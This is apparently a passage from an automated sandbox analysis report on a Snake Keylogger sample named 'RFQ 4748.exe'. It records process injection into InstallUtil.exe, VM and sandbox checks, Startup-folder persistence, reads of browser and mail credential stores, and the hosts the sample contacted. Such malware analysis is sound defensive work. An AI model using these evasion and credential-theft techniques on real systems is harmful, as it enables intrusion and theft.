                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95110Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 94985Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 94860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598607Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597949Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597715Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597599Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595208Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595049Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594811Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: InstallUtil.exe, 00000002.00000002.4493847698.0000000000EB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpQ!
                  Source: Fallback.exe, 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: Fallback.exe, 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: RFQ 4748.exe, 00000000.00000002.2088528133.0000000001092000.00000004.00000020.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2286946113.0000000001634000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4493267308.0000000000B56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\RFQ 4748.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\RFQ 4748.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: A36008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 96E008Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Fallback.exe "C:\Users\user\AppData\Roaming\Fallback.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeQueries volume information: C:\Users\user\Desktop\RFQ 4748.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeQueries volume information: C:\Users\user\AppData\Roaming\Fallback.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4492614618.0000000000419000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4496477218.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2303227720.000000000440D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4496144498.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4496144498.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4496477218.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3652, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3652, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4492614618.0000000000419000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4496477218.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2303227720.000000000440D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4496144498.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4496144498.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4496477218.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3652, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		Valid Accounts1
                  Scheduled Task/Job                  		111
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		211
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		21
                  Obfuscated Files or Information                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin Shares1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder                  		2
                  Registry Run Keys / Startup Folder                  		1
                  Software Packing                  		NTDS21
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                  Process Injection                  		Proc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551956 Sample: RFQ 4748.exe Startdate: 08/11/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 www.oleonidas.gr 2->32 34 3 other IPs or domains 2->34 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 12 other signatures 2->50 8 wscript.exe 1 2->8         started        11 RFQ 4748.exe 15 5 2->11         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 process4 dnsIp5 56 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->56 15 Fallback.exe 14 2 8->15         started        40 oleonidas.gr 185.78.221.73, 443, 49704, 49722 IPHOSTGRIpDomainGR Greece 11->40 24 C:\Users\user\AppData\Roaming\Fallback.exe, PE32 11->24 dropped 26 C:\Users\user\AppData\...\Fallback.vbs, ASCII 11->26 dropped 28 C:\Users\...\Fallback.exe:Zone.Identifier, ASCII 11->28 dropped 58 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->58 60 Writes to foreign memory regions 11->60 62 Injects a PE file into a foreign processes 11->62 18 InstallUtil.exe 14 2 11->18         started        file6 signatures7 process8 dnsIp9 64 Antivirus detection for dropped file 15->64 66 Multi AV Scanner detection for dropped file 15->66 68 Machine Learning detection for dropped file 15->68 72 2 other signatures 15->72 21 InstallUtil.exe 2 15->21         started        36 checkip.dyndns.com 193.122.6.168, 49705, 49708, 49710 ORACLE-BMC-31898US United States 18->36 38 reallyfreegeoip.org 188.114.96.3, 443, 49706, 49707 CLOUDFLARENETUS European Union 18->38 70 Tries to steal Mail credentials (via file / registry access) 18->70 signatures10 process11 signatures12 52 Tries to steal Mail credentials (via file / registry access) 21->52 54 Tries to harvest and steal browser information (history, passwords, etc) 21->54

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  RFQ 4748.exe32%ReversingLabs
                  RFQ 4748.exe100%AviraHEUR/AGEN.1309900
                  RFQ 4748.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
